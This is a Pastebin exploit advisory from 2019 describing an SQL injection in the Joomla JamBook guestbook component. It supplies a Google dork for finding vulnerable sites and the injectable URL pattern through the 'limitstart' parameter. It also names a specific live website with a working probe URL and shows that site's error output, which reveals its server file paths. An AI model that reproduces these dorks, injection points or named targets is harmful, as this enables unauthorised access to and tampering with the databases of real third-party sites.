KingSkrupellos

Joomla JamBook Components 1.5 SQL Injection

Jan 31st, 2019
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.16 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla JamBook Components 1.5 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/02/2019
  7. # Vendor Homepage : joomlacode.org
  8. # Software Download Link : joomlacode.org/gf/project/jambook/
  9. # Software Version : 1.0 and 1.5
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/index.php?option=com_jambook''
  14. Developed by MATspot.net. Optimised for Mozilla Firefox
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. Jambook is a feature rich open source Joomla guestbook component with spam
  26.  
  27. protection, email address cloaking, flood protection, double posting checks
  28.  
  29. and the ability to use Joomla wysiwyg editor, even for guests!
  30.  
  31. It shows guestbook entries from the Jambook component.
  32.  
  33. It has been written from scratch to be easy to use and
  34.  
  35. yet have powerful functionality for the administrator.
  36.  
  37. Two extra extensions for Jambook released.
  38.  
  39. Jx Show Jambook
  40.  
  41. This module allows you to list Jambook entries elsewhere on your site.
  42.  
  43. Jx Jambook Search
  44.  
  45. A search plugin (mambot) to add Jambook search to the standard Joomla search.
  46.  
  47. ####################################################################
  48.  
  49. # Impact :
  50. ***********
  51.  
  52. Joomla JamBook Components 1.5 component for Joomla! is
  53.  
  54. prone to an SQL-injection vulnerability because it fails to sufficiently
  55.  
  56. sanitize user-supplied data before using it in an SQL query.
  57.  
  58. A successful exploit may allow an attacker to compromise the application, access
  59.  
  60. or modify data, or exploit latent vulnerabilities in the underlying database.
  61.  
  62. A remote attacker can send a specially crafted request to the vulnerable application
  63.  
  64. and execute arbitrary SQL commands in application`s database.
  65.  
  66. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  67.  
  68. An attacker can exploit this issue using a browser.
  69.  
  70. ####################################################################
  71.  
  72. # SQL Injection Exploit :
  73. **********************
  74.  
  75. /index.php?option=com_jambook&Itemid=[ID-NUMBER]&task=list&sort=createddesc&limit=[ID-NUMBER]&limitstart=[SQL Injection]
  76.  
  77. ####################################################################
  78.  
  79. # Example Vulnerable Sites :
  80. *************************
  81.  
  82. [+] eden.rs.ba/index.php?option=com_jambook&Itemid=31
  83. &task=list&sort=createddesc&limit=5&limitstart=200%27
  84.  
  85. ####################################################################
  86.  
  87. # Example SQL Database Error :
  88. ****************************
  89.  
  90. Deprecated: Assigning the return value of new by reference is deprecated
  91. in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 836
  92.  
  93. Deprecated: preg_replace(): The /e modifier is deprecated, use
  94. preg_replace_callback instead in /home/diskocic/public_html
  95. /eden.rs.ba/includes/phpInputFilter/class.inputfilter.php on line 457
  96.  
  97. Deprecated: Function split() is deprecated in
  98. /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 1527
  99.  
  100. Deprecated: Function eregi() is deprecated in
  101. /home/diskocic/public_html/eden.rs.ba/includes/sef.php on line 533
  102.  
  103. Warning: Cannot modify header information - headers already sent by
  104. (output started at /home/diskocic/public_html/eden.rs.ba/includes
  105. /joomla.php:836) in /home/diskocic/public_html/eden.rs.ba
  106. /includes/joomla.php on line 697
  107.  
  108. Strict Standards: Non-static method mosCache::getCache()
  109. should not be called statically in /home/diskocic/public_html
  110. /eden.rs.ba/includes/frontend.php on line 199
  111.  
  112. ####################################################################
  113.  
  114. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  115.  
  116. ####################################################################
Add Comment
Please, Sign In to add comment